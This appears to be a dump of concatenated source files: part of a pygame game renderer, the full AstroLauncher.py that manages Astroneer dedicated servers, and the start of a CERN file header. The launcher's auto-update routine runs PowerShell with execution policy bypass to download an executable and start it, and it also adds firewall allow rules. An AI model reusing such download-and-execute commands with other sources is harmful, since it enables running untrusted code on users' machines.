self.fence_h = pygame.transform.scale(
self.fence_image_height,
(self.BORDER_SIZE, self.HEIGHT - 2 * self.BORDER_SIZE))
self.barier_image = pygame.image.load(self.photos_path / 'Box.png')
self.barier_size = (sight.cell_size, sight.cell_size)
self.barier = pygame.transform.scale(self.barier_image,
self.barier_size)
self.images = {}
self.angles = {}
self.loaded = True
def get_image(self, object_, angle):
if object_.gameobject.image not in self.images:
image = pygame.image.load(
self.photos_path / object_.gameobject.image)
self.images[object_.gameobject.image] = pygame.transform.scale(
image,
object_.size[::-1]
)
if (object_.gameobject.image, angle) not in self.images:
image = pygame.transform.rotate(
self.images[object_.gameobject.image],
angle
)
self.images[object_.gameobject.image, angle] = image
return self.images[object_.gameobject.image, angle]
def observe(self, sight):
self.load(sight)
background_color = (255, 255, 255)
self.WIN.fill(background_color)
self.WIN.blit(self.fence_w, (0, 0))
self.WIN.blit(self.fence_w, (0, self.HEIGHT - self.BORDER_SIZE))
self.WIN.blit(self.fence_h, (0, self.BORDER_SIZE))
self.WIN.blit(self.fence_h, (self.WIDTH - self.BORDER_SIZE,
self.BORDER_SIZE))
for i, row in enumerate(sight.map_._map):
for j, cell in enumerate(row):
if cell == Cell.WALL:
top_left_coord = (j * sight.cell_size + self.BORDER_SIZE,
i * sight.cell_size + self.BORDER_SIZE)
self.WIN.blit(self.barier, top_left_coord)
new_angles = {}
for object_ in sight.objects:
action = object_.direction.to_action()
if isinstance(object_.gameobject, Weapon):
if id(object_) not in self.angles:
angle = 0
else:
angle = self.angles[id(object_)] + 12
new_angles[id(object_)] = angle
elif action == Action.MOVE_LEFT:
angle = 0
elif action == Action.MOVE_RIGHT:
angle = 180
elif action == Action.MOVE_DOWN:
angle = 90
elif action == Action.MOVE_UP:
angle = 270
image = self.get_image(object_, angle)
self.WIN.blit(image,
(object_.x + self.BORDER_SIZE,
object_.y + self.BORDER_SIZE))
self.angles = new_angles
pygame.display.update()
class Bot(Player):
def __init__(self, strategy, *args, **kwargs):
super().__init__(*args, **kwargs)
self.strategy = strategy
self.state = None
def decide(self):
return self._parse(self.strategy.decide(bot=self))
def observe(self, sight: Observation):
self.state = sight
@staticmethod
def _parse(decision: list[float]) -> list[Action]:
sorted_decision = sorted(range(len(decision)),
key=lambda k: decision[k])
actions = [Action(sorted_decision[-1])]
if sorted_decision[-2] == 5:
actions.append(Action.SHOOT)
return actions
|
AstroLauncher.py | import argparse
import asyncio
import atexit
import ctypes
import dataclasses
import json
import os
import secrets
import shutil
import signal
import socket
import subprocess
import sys
import time
import zipfile
from distutils import dir_util
from threading import Thread
import psutil
from packaging import version
from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer
import cogs.AstroAPI as AstroAPI
import cogs.AstroWebServer as AstroWebServer
import cogs.ValidateSettings as ValidateSettings
from cogs.AstroDaemon import AstroDaemon
from cogs.AstroDedicatedServer import AstroDedicatedServer
from cogs.AstroLogging import AstroLogging
from cogs.MultiConfig import MultiConfig
from cogs.utils import AstroRequests
from cogs.utils import ALVERSION
"""
Build:
pyinstaller AstroLauncher.py -F --add-data "assets;./assets" --icon=assets/astrolauncherlogo.ico
or
python BuildEXE.py
"""
class AstroLauncher():
""" Starts a new instance of the Server Launcher"""
@dataclasses.dataclass
class LauncherConfig():
AutoUpdateLauncherSoftware: bool = True
AutoUpdateServerSoftware: bool = True
UpdateOnServerRestart: bool = True
HideServerConsoleWindow: bool = False
HideLauncherConsoleWindow: bool = False
ServerStatusFrequency: float = 2
PlayfabAPIFrequency: float = 2
HeartBeatFailRestartServer: int = 8
DisableBackupRetention: bool = False
BackupRetentionPeriodHours: float = 72
BackupRetentionFolderLocation: str = r"Astro\Saved\Backup\LauncherBackups"
EnableAutoRestart: bool = False
AutoRestartEveryHours: float = 24
AutoRestartSyncTimestamp: str = "00:00"
DisableNetworkCheck: bool = False
OverwritePublicIP: bool = False
ShowServerFPSInConsole: bool = True
AdminAutoConfigureFirewall: bool = True
LogRetentionDays: int = 7
DiscordWebHookURL: str = ""
DiscordWebHookLevel: str = "cmd"
RODataURL: str = secrets.token_hex(16)
DisableWebServer: bool = False
WebServerPort: int = 5000
WebServerPasswordHash: str = ""
WebServerBaseURL: str = "/"
EnableWebServerSSL: bool = False
SSLPort: int = 443
SSLCertFile: str = ""
SSLKeyFile: str = ""
CPUAffinity: str = ""
def __post_init__(self):
# pylint: disable=no-member
hasError = False
for field, data in self.__dataclass_fields__.items():
try:
self.__dict__[field] = data.type(self.__dict__[field])
except ValueError:
hasError = True
AstroLogging.logPrint(
f"INI error: {field} must be of type {data.type.__name__}", "critical")
if hasError:
AstroLogging.logPrint(
"Fix your launcher config file!", "critical")
sys.exit()
class SaveHandler(FileSystemEventHandler):
def __init__(self, launcher):
self.launcher = launcher
self.astroPath = self.launcher.astroPath
self.moveToPath = self.launcher.launcherConfig.BackupRetentionFolderLocation
super().__init__()
def on_created(self, event):
# print(event)
# time.sleep(1)
try:
time.sleep(0.5)
dirName = os.path.dirname(event.src_path)
fileNames = [os.path.join(dirName, f) for f in os.listdir(
dirName) if os.path.isfile(os.path.join(dirName, f))]
# print(fileNames)
fileName = sorted(
fileNames, key=os.path.getmtime, reverse=True)[0]
AstroLogging.logPrint(
f"Server saved. {os.path.basename(fileName)}", dwet="s")
except:
pass
# self.launcher.saveObserver.stop()
class BackupHandler(FileSystemEventHandler):
def __init__(self, launcher):
self.launcher = launcher
self.astroPath = self.launcher.astroPath
self.moveToPath = self.launcher.launcherConfig.BackupRetentionFolderLocation
self.retentionPeriodHours = self.launcher.launcherConfig.BackupRetentionPeriodHours
self.pendingFiles = []
super().__init__()
def handle_files(self):
# print(f"first: {self.pendingFiles}")
time.sleep(2)
# print(f"second: {self.pendingFiles}")
# AstroLogging.logPrint("DEBUG: INSIDE THREAD")
path = os.path.join(self.astroPath, self.moveToPath)
try:
if not os.path.exists(path):
os.makedirs(path)
except Exception as e:
AstroLogging.logPrint(e, "error")
now = time.time()
try:
for f in os.listdir(path):
fpath = os.path.join(path, f)
if os.stat(fpath).st_mtime < (now - (self.retentionPeriodHours * 60 * 60)):
os.remove(fpath)
except Exception as e:
AstroLogging.logPrint(e, "error")
AstroLogging.logPrint(
"Copying backup(s) to retention folder.", dwet="b")
# time.sleep(1)
try:
dirName = os.path.dirname(self.pendingFiles[0])
fileNames = [os.path.join(dirName, f) for f in os.listdir(
dirName) if os.path.isfile(os.path.join(dirName, f))]
for cFile in fileNames:
# AstroLogging.logPrint(newFile, "debug")
# print(cFile)
shutil.copy2(cFile, path)
# AstroLogging.logPrint(copiedFile, "debug")
except FileNotFoundError as e:
AstroLogging.logPrint(e, "error")
except Exception as e:
AstroLogging.logPrint(e, "error")
self.launcher.backupObserver.stop()
self.launcher.backup_retention()
def on_deleted(self, event):
# AstroLogging.logPrint(event)
# AstroLogging.logPrint("File in save directory changed")
# AstroLogging.logPrint("DEBUG: File modified.. Starting thread")
try:
self.pendingFiles.append(event.src_path)
if len(self.pendingFiles) == 1:
t = Thread(target=self.handle_files, args=())
t.daemon = True
t.start()
except:
pass
def __init__(self, astroPath, launcherINI="Launcher.ini", disable_auto_update=None):
AstroLogging.setup_logging()
self.launcherINI = launcherINI
self.launcherConfig = self.LauncherConfig()
self.launcherPath = os.getcwd()
self.refresh_launcher_config()
# check if path specified
if astroPath is not None:
if os.path.exists(os.path.join(astroPath, "AstroServer.exe")):
self.astroPath = astroPath
else:
AstroLogging.logPrint(
"Specified path does not contain the server executable! (AstroServer.exe)", "critical")
time.sleep(5)
return
# check if executable in current directory
elif os.path.exists(os.path.join(os.getcwd(), "AstroServer.exe")):
self.astroPath = os.getcwd()
else:
AstroLogging.logPrint(
"Unable to find server executable anywhere! (AstroServer.exe)", "warning")
# finally, try to install the server
try:
if astroPath is None:
self.astroPath = os.getcwd()
self.check_for_server_update()
except Exception as e:
AstroLogging.logPrint(e, "critical")
return
# AstroRequests.checkProxies()
AstroLogging.discordWebhookURL = self.launcherConfig.DiscordWebHookURL
dwhl = self.launcherConfig.DiscordWebHookLevel.lower()
dwhl = dwhl if dwhl in ("all", "cmd", "chat") else "cmd"
AstroLogging.discordWebhookLevel = dwhl
self.start_WebHookLoop()
AstroLogging.setup_loggingPath(
astroPath=self.astroPath, logRetention=int(self.launcherConfig.LogRetentionDays))
if disable_auto_update is not None:
self.launcherConfig.AutoUpdateLauncherSoftware = not disable_auto_update
self.version = ALVERSION
colsize = os.get_terminal_size().columns
if colsize >= 77:
vText = "Version " + self.version[1:]
# pylint: disable=anomalous-backslash-in-string
print(" __________________________________________________________________________\n" +
"| _ _ _ _ |\n" +
"| /_\\ ___| |_ _ _ ___ | | __ _ _ _ _ _ __ | |_ ___ _ _ |\n" +
"| / _ \\ (_-<| _|| '_|/ _ \\ | |__ / _` || || || ' \\ / _|| ' \\ / -_)| '_| |\n" +
"| /_/ \\_\\/__/ \\__||_| \\___/ |____|\\__,_| \\_,_||_||_|\\__||_||_|\\___||_| |\n" +
"| |\n" +
"|"+vText.center(74)+"|\n" +
"|__________________________________________________________________________|")
AstroLogging.logPrint(
f"AstroLauncher - Unofficial Dedicated Server Launcher {self.version}")
AstroLogging.logPrint(
"If you encounter any bugs please open a new issue at:")
AstroLogging.logPrint(
"https://github.com/ricky-davis/AstroLauncher/issues")
AstroLogging.logPrint(
"To safely stop the launcher and server press CTRL+C")
self.latestURL = "https://github.com/ricky-davis/AstroLauncher/releases/latest"
bName = os.path.basename(sys.executable)
if sys.argv[0] == os.path.splitext(bName)[0]:
self.isExecutable = True
else:
self.isExecutable = os.path.samefile(sys.executable, sys.argv[0])
self.cur_server_version = "0.0"
self.headers = AstroAPI.base_headers
self.DaemonProcess = None
self.saveObserver = None
self.backupObserver = None
self.hasUpdate = False
self.is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
self.affinity = self.launcherConfig.CPUAffinity
try:
if self.affinity != "":
affinityList = [int(x.strip())
for x in self.affinity.split(',')]
p = psutil.Process()
p.cpu_affinity(affinityList)
except ValueError as e:
AstroLogging.logPrint(f"CPU Affinity Error: {e}", "critical")
AstroLogging.logPrint(
"Please correct this in your launcher config", "critical")
return
self.check_for_server_update()
self.DedicatedServer = AstroDedicatedServer(
self.astroPath, self)
self.check_for_launcher_update()
AstroLogging.logPrint("Starting a new session")
self.validate_playfab_certs()
self.check_ports_free()
if self.launcherConfig.AdminAutoConfigureFirewall:
self.configure_firewall()
if not self.launcherConfig.DisableNetworkCheck:
AstroLogging.logPrint("Checking the network configuration..")
self.check_network_config()
self.save_reporting()
if not self.launcherConfig.DisableBackupRetention:
self.backup_retention()
AstroLogging.logPrint("Backup retention started")
# setup queue for data exchange
self.webServer = None
if not self.launcherConfig.DisableWebServer:
# start http server
self.webServer = self.start_WebServer()
self.start_InfoLoop()
# AstroLogging.logPrint(
# f"HTTP Server started at 127.0.0.1:{self.launcherConfig.WebServerPort}")
if self.launcherConfig.HideLauncherConsoleWindow:
# hide window
AstroLogging.logPrint(
"HideLauncherConsoleWindow enabled, Hiding window in 5 seconds...")
time.sleep(5)
# pylint: disable=redefined-outer-name
kernel32 = ctypes.WinDLL('kernel32')
user32 = ctypes.WinDLL('user32')
hWnd = kernel32.GetConsoleWindow()
user32.ShowWindow(hWnd, 0)
self.start_server(firstLaunch=True)
def save_reporting(self):
if self.saveObserver:
if not self.saveObserver.is_alive():
self.saveObserver = None
self.save_reporting()
else:
self.saveObserver = Observer()
saveGamePath = r"Astro\Saved\SaveGames"
watchPath = os.path.join(
self.astroPath, saveGamePath)
try:
if not os.path.exists(watchPath):
os.makedirs(watchPath)
except Exception as e:
AstroLogging.logPrint(e)
self.saveObserver.schedule(
self.SaveHandler(self), watchPath)
self.saveObserver.start()
def backup_retention(self):
if self.backupObserver:
if not self.backupObserver.is_alive():
self.backupObserver = None
self.backup_retention()
else:
self.backupObserver = Observer()
backupSaveGamePath = r"Astro\Saved\Backup\SaveGames"
watchPath = os.path.join(
self.astroPath, backupSaveGamePath)
try:
if not os.path.exists(watchPath):
os.makedirs(watchPath)
except Exception as e:
AstroLogging.logPrint(e)
self.backupObserver.daemon = True
self.backupObserver.schedule(
self.BackupHandler(self), watchPath)
self.backupObserver.start()
def refresh_launcher_config(self, lcfg=None):
field_names = set(
f.name for f in dataclasses.fields(self.LauncherConfig))
cleaned_config = {k: v for k,
v in self.get_launcher_config(lcfg).items() if k in field_names}
self.launcherConfig = dataclasses.replace(
self.launcherConfig, **cleaned_config)
config = MultiConfig()
config.read_dict({"AstroLauncher": cleaned_config})
with open(self.launcherINI, 'w') as configfile:
config.write(configfile)
def overwrite_launcher_config(self, ovrDict):
ovrConfig = {
"AstroLauncher": ovrDict
}
MultiConfig().overwrite_with(self.launcherINI, ovrConfig)
def get_launcher_config(self, lfcg=None):
if not lfcg:
lfcg = self.LauncherConfig()
baseConfig = {
"AstroLauncher": dataclasses.asdict(lfcg)
}
config = MultiConfig().baseline(self.launcherINI, baseConfig)
# print(settings)
settings = config.getdict()['AstroLauncher']
return settings
def validate_playfab_certs(self):
AstroLogging.logPrint("Attempting to validate Playfab Certs")
playfabRequestCommand = ["powershell", '-executionpolicy', 'bypass', '-command',
'Invoke-WebRequest -uri https://5ea1.playfabapi.com/ -UseBasicParsing']
with open(os.devnull, 'w') as tempf:
proc = subprocess.Popen(
playfabRequestCommand, stdout=tempf, stderr=tempf)
proc.communicate()
def update_server(self, latest_version):
updateLocation = os.path.join(
self.astroPath, 'steamcmd', 'steamapps', 'common', 'ASTRONEER Dedicated Server')
steamcmdFolder = os.path.join(self.astroPath, "steamcmd")
steamcmdExe = os.path.join(steamcmdFolder, "steamcmd.exe")
steamcmdZip = os.path.join(self.astroPath, "steamcmd.zip")
try:
if not os.path.exists(steamcmdFolder):
if not os.path.exists(steamcmdExe):
if not os.path.exists(steamcmdZip):
url = "https://steamcdn-a.akamaihd.net/client/installer/steamcmd.zip"
r = (AstroRequests.get(url)).read()
with open(steamcmdZip, 'wb') as f:
f.write(r)
with zipfile.ZipFile(steamcmdZip, 'r') as zip_ref:
zip_ref.extractall(steamcmdFolder)
update_downloaded = False
if os.path.exists(updateLocation):
upd_version = "0.0"
try:
with open(os.path.join(updateLocation, "build.version"), "r") as f:
upd_version = (f.readline())[:-10]
if upd_version == latest_version:
update_downloaded = True
except:
try:
shutil.rmtree(updateLocation)
except:
pass
if not update_downloaded:
open("update.p", "wb").write(b"download")
if os.path.exists(steamcmdExe):
try:
os.remove(steamcmdZip)
except:
pass
AstroLogging.logPrint(
f"AUTOMATICALLY UPDATING SERVER TO {latest_version}...")
try:
updateCMD = [steamcmdExe, '+login anonymous',
'+app_update 728470', 'validate', '+quit']
update = subprocess.Popen(
updateCMD, creationflags=subprocess.DETACHED_PROCESS)
while update.poll() is None:
time.sleep(0.1)
except Exception as e:
for child in psutil.Process(update.pid).children():
try:
child.kill()
except:
pass
try:
update.kill()
except:
pass
raise Exception("") from e
upd_version = "0.0"
try:
with open(os.path.join(updateLocation, "build.version"), "r") as f:
upd_version = (f.readline())[:-10]
except:
pass
if upd_version == latest_version:
update_downloaded = True
if update_downloaded:
open("update.p", "wb").write(b"transfer")
dir_util.copy_tree(updateLocation, self.astroPath)
open("update.p", "wb").write(b"complete")
cur_version = "0.0"
with open(os.path.join(self.astroPath, "build.version"), "r") as f:
cur_version = (f.readline())[:-10]
if cur_version == latest_version:
AstroLogging.logPrint(
f"UPDATE TO {latest_version} SUCCESSFUL.")
steamcmdZip = os.path.join(self.astroPath, "steamcmd.zip")
if os.path.exists(steamcmdZip):
os.remove(steamcmdZip)
try:
os.remove("update.p")
except:
pass
try:
shutil.rmtree(updateLocation)
except:
pass
except: # Exception as e:
AstroLogging.logPrint(
f"UPDATE TO {latest_version} FAILED.", "warning")
def check_for_server_update(self, serverStart=False, check_only=False):
try:
# print('here1')
if not self.launcherConfig.UpdateOnServerRestart and serverStart:
return
else:
# print('here2')
needs_update = False
update_status = None
if os.path.exists("update.p"):
with open("update.p", "r") as f:
update_status = f.read()
if update_status != "completed":
needs_update = True
# print('here3')
cur_version = "0.0"
try:
with open(os.path.join(self.astroPath, "build.version"), "r") as f:
cur_version = (f.readline())[:-10]
except:
pass
# print(cur_version)
# print('here4')
if cur_version == "0.0":
needs_update = True
url = "https://servercheck.spycibot.com/stats"
data = json.load(AstroRequests.get(url))
# print(data)
# print('here6')
latest_version = data['LatestVersion']
if version.parse(latest_version) > version.parse(cur_version):
needs_update = True
if not os.path.exists(os.path.join(self.astroPath, "AstroServer.exe")):
needs_update = True
if needs_update:
AstroLogging.logPrint(
f"SERVER UPDATE AVAILABLE: {cur_version} -> {latest_version}", "warning")
# print('here7')
if self.launcherConfig.AutoUpdateServerSoftware and not check_only:
self.update_server(latest_version)
# print('here8')
return True, latest_version
cur_version = "0.0"
with open(os.path.join(self.astroPath, "build.version"), "r") as f:
cur_version = (f.readline())[:-10]
self.cur_server_version = cur_version
# print('here9')
except Exception as e:
print(e)
AstroLogging.logPrint(
"Failed to check if update is available", "warning")
return False, "0.0"
def check_for_launcher_update(self, serverStart=False):
try:
url = "https://api.github.com/repos/ricky-davis/AstroLauncher/releases/latest"
data = json.load((AstroRequests.get(url)))
latestVersion = data['tag_name']
if version.parse(latestVersion) > version.parse(self.version):
self.hasUpdate = latestVersion
AstroLogging.logPrint(
f"UPDATE: There is a newer version of the launcher out! {latestVersion}")
AstroLogging.logPrint(f"Download it at {self.latestURL}")
aupdate = self.launcherConfig.AutoUpdateLauncherSoftware
if not self.launcherConfig.UpdateOnServerRestart and serverStart:
return
if self.isExecutable and aupdate:
self.autoupdate_launcher(data)
except:
AstroLogging.logPrint(
"Could not determine if new update exists.", msgType="debug")
def autoupdate_launcher(self, data):
x = data
downloadFolder = os.path.dirname(sys.executable)
for fileObj in x['assets']:
downloadURL = fileObj['browser_download_url']
fileName = (os.path.splitext(fileObj['name'])[0])
downloadPath = os.path.join(downloadFolder, fileName)
downloadCMD = ["powershell", '-executionpolicy', 'bypass', '-command',
'Write-Host "Downloading latest AstroLauncher.exe..";', 'wait-process', str(
os.getpid()), ';',
'[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;',
"$ProgressPreference = 'SilentlyContinue';",
'Invoke-WebRequest', f"'{downloadURL}'", "-OutFile", f"'{downloadPath + '_new.exe'}'", ';',
"Move-Item", "-path", f"'{downloadPath + '_new.exe'}'", "-destination", f"'{downloadPath + '.exe'}'", "-Force;",
'Write-Host "Download complete!";',
'Start-Process', f"'{downloadPath + '.exe'}'"]
# print(' '.join(downloadCMD))
subprocess.Popen(downloadCMD, shell=True, creationflags=subprocess.DETACHED_PROCESS,
stdin=None, stdout=None, stderr=None, close_fds=True)
time.sleep(2)
self.DedicatedServer.kill_server("Auto-Update")
# pylint: disable=unused-argument
def signal_handler(self, sig, frame):
self.DedicatedServer.kill_server(
reason="Launcher shutting down via signal", save=True)
def start_server(self, firstLaunch=False):
"""
Starts the Dedicated Server process and waits for it to be registered
"""
if firstLaunch:
atexit.register(self.DedicatedServer.kill_server,
reason="Launcher shutting down via exit",
save=True)
signal.signal(signal.SIGINT, self.signal_handler)
else:
self.check_for_server_update(serverStart=True)
self.check_for_launcher_update(serverStart=True)
self.DedicatedServer = AstroDedicatedServer(
self.astroPath, self)
self.DedicatedServer.status = "starting"
self.DedicatedServer.busy = False
gxAuth = None
while gxAuth is None:
try:
gxAuth = AstroAPI.generate_XAUTH(
self.DedicatedServer.settings.ServerGuid)
except:
AstroLogging.logPrint(
"Unable to generate XAuth token... Are you connected to the internet?", msgType="warning")
time.sleep(5)
self.headers['X-Authorization'] = gxAuth
oldLobbyIDs = self.DedicatedServer.deregister_all_server()
AstroLogging.logPrint("Starting Server process...")
if self.launcherConfig.EnableAutoRestart:
AstroLogging.logPrint(
f"Next restart is at {self.DedicatedServer.nextRestartTime}")
# time.sleep(5)
startTime = time.time()
try:
self.DedicatedServer.start()
except:
AstroLogging.logPrint(
"Unable to launch AstroServer.exe", "critical")
return False
reachableProcess = None
pcounter = 40
while not reachableProcess:
try:
reachableProcess = not bool(
self.DedicatedServer.process.poll())
pcounter -= 1
time.sleep(0.25)
except:
pcounter -= 2
time.sleep(0.5)
if pcounter <= 0:
AstroLogging.logPrint(
"Unable to start Server Process after 10 seconds!", "critical")
return False
AstroLogging.logPrint(
f"Server started ( {self.cur_server_version} )! Getting ready....", ovrDWHL=True)
try:
self.DaemonProcess = AstroDaemon.launch(
executable=self.isExecutable, consolePID=self.DedicatedServer.process.pid)
except:
AstroLogging.logPrint(
"Unable to start watcher daemon", "warning")
return False
# Wait for server to finish registering...
serverData = None
oPFF = self.launcherConfig.PlayfabAPIFrequency
while not self.DedicatedServer.registered:
AstroLogging.logPrint("Waiting for server to register...", "debug")
try:
serverData = (AstroAPI.get_server(
self.DedicatedServer.ipPortCombo, self.headers))
serverData = serverData['data']['Games']
lobbyIDs = [x['LobbyID'] for x in serverData]
if len(set(lobbyIDs) - set(oldLobbyIDs)) == 0:
time.sleep(self.launcherConfig.PlayfabAPIFrequency)
else:
now = time.time()
if now - startTime > 15:
serverData = serverData[0]
self.DedicatedServer.registered = True
oldLobbyIDs = None
self.DedicatedServer.LobbyID = serverData['LobbyID']
if self.DedicatedServer.process.poll() is not None:
AstroLogging.logPrint(
"Server was forcefully closed before registration. Exiting....")
return False
except KeyboardInterrupt:
self.DedicatedServer.kill_server(
"Launcher shutting down via KeyboardInterrupt")
except:
AstroLogging.logPrint(
"Failed to check server. Probably hit rate limit. Backing off and trying again...")
if self.launcherConfig.PlayfabAPIFrequency < 30:
self.launcherConfig.PlayfabAPIFrequency += 1
time.sleep(self.launcherConfig.PlayfabAPIFrequency)
self.launcherConfig.PlayfabAPIFrequency = oPFF
self.DedicatedServer.serverData = serverData
doneTime = time.time()
elapsed = doneTime - startTime
# AstroLogging.logPrint("This is to show we're in the debug AstroLauncher version", "debug")
AstroLogging.logPrint(
f"Server ready! Took {round(elapsed,2)} seconds to register.", ovrDWHL=True) # {self.DedicatedServer.LobbyID}
self.DedicatedServer.status = "ready"
# AstroLogging.logPrint("Starting server_loop: 1", "debug")
self.DedicatedServer.server_loop()
def check_ports_free(self):
serverPort = False
sp = int(self.DedicatedServer.settings.Port)
consolePort = False
cp = int(self.DedicatedServer.settings.ConsolePort)
webPort = False
wp = int(self.launcherConfig.WebServerPort)
def is_port_in_use(port, tcp=True):
lc = psutil.net_connections('inet')
lc = [x for x in lc if x.type == (
socket.SOCK_STREAM if tcp else socket.SOCK_DGRAM) and x.laddr[1] == port]
return len(lc) > 0
serverPort = bool(is_port_in_use(sp, False))
consolePort = bool(is_port_in_use(cp))
if not self.launcherConfig.DisableWebServer:
webPort = bool(is_port_in_use(wp))
if serverPort:
AstroLogging.logPrint(
f"A process is already using your Server Port ( {sp} UDP )", "critical")
if consolePort:
AstroLogging.logPrint(
f"A process is already using your Console Port ( {cp} TCP )", "critical")
if webPort:
AstroLogging.logPrint(
f"A process is already using your Web Port ( {wp} TCP )", "critical")
if serverPort or consolePort or webPort:
self.kill_launcher()
def configure_firewall(self):
if not self.launcherConfig.AdminAutoConfigureFirewall:
return
ALRule = None
ALWRule = None
ASRule = None
launcherEXEPath = None
isFirewallEnabled = None
with os.popen(
'netsh advfirewall show currentprofile | findstr /L "State" | findstr /L "ON"') as fwCheck:
isFirewallEnabled = fwCheck.read()
if isFirewallEnabled:
serverExePath = os.path.join(
self.astroPath, 'astro\\binaries\\win64\\astroserver-win64-shipping.exe')
ASRule = os.popen(
f'netsh advfirewall firewall show rule name=astroserver-win64-shipping.exe verbose | findstr /L "{serverExePath}"').read()
if self.isExecutable:
launcherEXEPath = os.path.join(os.getcwd(), sys.argv[0])
ALRule = os.popen(
f'netsh advfirewall firewall show rule name=astrolauncher.exe verbose | findstr /L "{launcherEXEPath}"').read()
if not self.launcherConfig.DisableWebServer:
ALWRule = os.popen(
f'netsh advfirewall firewall show rule name=AstroLauncherWeb | findstr /L "{self.launcherConfig.WebServerPort}"').read()
if not self.is_admin:
if (not ASRule)\
or (self.isExecutable and not ALRule)\
or (not self.launcherConfig.DisableWebServer and self.isExecutable and not ALWRule):
AstroLogging.logPrint(
"Could not find firewall settings! Please relaunch as Administrator.", "warning")
else:
newRules = False
if not ASRule:
newRules = True
subprocess.call(
f'netsh advfirewall firewall delete rule name=astroserver-win64-shipping.exe dir=in program="{serverExePath}"' +
f'& netsh advfirewall firewall add rule name=astroserver-win64-shipping.exe dir=in action=allow program="{serverExePath}"',
shell=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
if self.isExecutable:
if not ALRule:
newRules = True
subprocess.call(
f'netsh advfirewall firewall delete rule name=astrolauncher.exe dir=in program="{launcherEXEPath}"' +
f'& netsh advfirewall firewall add rule name=astrolauncher.exe dir=in action=allow program="{launcherEXEPath}"',
shell=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
if not self.launcherConfig.DisableWebServer and not ALWRule:
newRules = True
subprocess.call(
f'netsh advfirewall firewall delete rule name=AstroLauncherWeb dir=in protocol=TCP localport={self.launcherConfig.WebServerPort}' +
f'& netsh advfirewall firewall add rule name=AstroLauncherWeb dir=in action=allow protocol=TCP localport={self.launcherConfig.WebServerPort}',
shell=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
if newRules:
AstroLogging.logPrint(
"Setting custom firewall rules...")
def check_network_config(self):
localTest = ValidateSettings.test_network(
self.DedicatedServer.settings.PublicIP, int(self.DedicatedServer.settings.Port), False)
remoteTest = ValidateSettings.test_nonlocal(
self.DedicatedServer.settings.PublicIP, int(self.DedicatedServer.settings.Port))
testMatrix = [localTest, remoteTest]
if testMatrix == [True, True]:
AstroLogging.logPrint("Server network configuration good!")
elif testMatrix == [False, True]:
AstroLogging.logPrint(
"Your server is not accessible from your local network.", "warning")
AstroLogging.logPrint(
"This usually indicates an issue with NAT Loopback", "warning")
AstroLogging.logPrint(
"See if your router supports it, or setup your server with playit.gg", "warning")
AstroLogging.logPrint(
"Guide to setting up playit.gg (11:28): https://youtu.be/SdLNFowq8WI?t=688", "warning")
elif testMatrix == [True, False]:
AstroLogging.logPrint(
"Your server can be seen locally, but not remotely.", "warning")
AstroLogging.logPrint(
"This usually means you have a Loopback adapter that needs to be disabled", "warning")
AstroLogging.logPrint(
"and that you may need to Port Forward/open your firewall.", "warning")
elif testMatrix == [False, False]:
AstroLogging.logPrint(
"The server is completely unreachable!", "warning")
AstroLogging.logPrint(
f"Please port forward {self.DedicatedServer.settings.Port} UDP and ensure the firewall settings are correct.", "warning")
rconNetworkCorrect = not (ValidateSettings.test_network(
self.DedicatedServer.settings.PublicIP, int(self.DedicatedServer.settings.ConsolePort), True))
if rconNetworkCorrect:
AstroLogging.logPrint("Remote Console network configuration good!")
else:
AstroLogging.logPrint(
f"SECURITY ALERT: Your console port ({self.DedicatedServer.settings.ConsolePort}) is Port Forwarded!", "warning")
AstroLogging.logPrint(
"SECURITY ALERT: This allows anybody to control your server.", "warning")
AstroLogging.logPrint(
"SECURITY ALERT: Disable this ASAP to prevent issues.", "warning")
time.sleep(5)
def start_WebServer(self):
ws = AstroWebServer.WebServer(self)
def start_WebServerThread():
if sys.version_info.minor > 7:
asyncio.set_event_loop_policy(
asyncio.WindowsSelectorEventLoopPolicy())
asyncio.set_event_loop(asyncio.new_event_loop())
ws.run()
t = Thread(target=start_WebServerThread, args=())
t.daemon = True
t.start()
return ws
def autoUpdate_websockets_Loop(self):
while True:
time.sleep(1)
self.webServer.iterWebSocketConnections()
def start_InfoLoop(self):
def start_InfoLoopThread(self):
if sys.version_info.minor > 7:
asyncio.set_event_loop_policy(
asyncio.WindowsSelectorEventLoopPolicy())
asyncio.set_event_loop(asyncio.new_event_loop())
self.autoUpdate_websockets_Loop()
t = Thread(target=start_InfoLoopThread, args=(self,))
t.daemon = True
t.start()
def kill_launcher(self):
time.sleep(5)
try:
for child in psutil.Process(os.getpid()).children():
child.kill()
except:
pass
# Kill current process
try:
os.kill(os.getpid(), 9)
except:
pass
def start_WebHookLoop(self):
t = Thread(target=AstroLogging.sendDiscordReqLoop, args=())
t.daemon = True
t.start()
if __name__ == "__main__":
try:
os.system("title AstroLauncher - Unofficial Dedicated Server Launcher")
except:
pass
try:
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--daemon", dest="daemon",
help="Set the launcher to run as a Daemon", action='store_true')
parser.add_argument(
"-c", "--consolepid", help="Set the consolePID for the Daemon", type=str.lower)
parser.add_argument(
"-l", "--launcherpid", help="Set the launcherPID for the Daemon", type=str.lower)
parser.add_argument(
"-p", "--path", help="Set the server folder path", type=str.lower)
parser.add_argument("-U", "--noupdate", dest="noautoupdate", default=None,
help="Disable autoupdate if running as exe", action='store_true')
parser.add_argument("-i", "--ini", dest="launcherINI", default="Launcher.ini",
help="Set the location of the Launcher INI")
args = parser.parse_args()
if args.daemon:
if args.consolepid and args.launcherpid:
kernel32 = ctypes.WinDLL('kernel32')
user32 = ctypes.WinDLL('user32')
SW_HIDE = 0
hWnd = kernel32.GetConsoleWindow()
if hWnd:
user32.ShowWindow(hWnd, SW_HIDE)
AstroDaemon().daemon(args.launcherpid, args.consolepid)
else:
print("Insufficient launch options!")
else:
AstroLauncher(
args.path, disable_auto_update=args.noautoupdate, launcherINI=args.launcherINI)
except KeyboardInterrupt:
pass
except Exception as err:
ermsg = ('FINAL Error on line {}'.format(
sys.exc_info()[-1].tb_lineno), type(err).__name__, err)
AstroLogging.logPrint(f"{ermsg}", "critical", True)
|
c3po.py | # -*- coding: utf-8 -*-
# Copyright 2015-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
